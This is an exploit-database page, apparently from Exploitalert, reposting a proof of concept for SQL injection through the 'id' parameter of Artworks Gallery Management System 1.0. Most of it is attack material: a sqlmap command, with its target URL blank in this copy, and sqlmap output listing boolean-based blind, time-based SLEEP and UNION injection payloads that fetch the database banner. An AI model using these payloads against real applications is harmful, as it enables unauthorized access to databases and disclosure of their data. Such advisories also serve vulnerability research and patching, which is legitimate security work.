Artworks Gallery Management System 1.0 id SQL Injection

CVE Category Price Severity
CWE-89 $1000 High
Author Risk Exploitation Type Date
Unknown High Remote 2020-12-24
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N 0.65487 0.94001

CVSS vector description

Our sensors found this exploit at:

Below is a copy:

Artworks Gallery Management System 1.0 id SQL Injection
# Exploit Title: Artworks Gallery Management System 1.0 - 'id' SQL Injection
# Exploit Author: Vijay Sachdeva
# Date: 2020-12-22
# Vendor Homepage:
# Software Link:
# Affected Version: Version 1
# Tested on Kali Linux

Step 1. Log in to the application with admin credentials.

Step 2. Click on "Explore" and then select "Artworks".

Step 3. Choose any item, the URL should be "


Step 4. Run sqlmap on the URL where the "id" parameter is given

sqlmap -u "" --banner


Parameter: id (GET)

    Type: boolean-based blind

    Title: AND boolean-based blind - WHERE or HAVING clause

    Payload: id=8 AND 4531=4531

    Type: time-based blind

    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

    Payload: id=8 AND (SELECT 7972 FROM (SELECT(SLEEP(5)))wPdG)

    Type: UNION query

    Title: Generic UNION query (NULL) - 9 columns

    Payload: id=8 UNION ALL SELECT


[08:18:34] [INFO] the back-end DBMS is MySQL

[08:18:34] [INFO] fetching banner

back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)

banner: '10.3.24-MariaDB-2'


Step 5. Sqlmap should inject the web-app successfully which leads to
information disclosure.

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum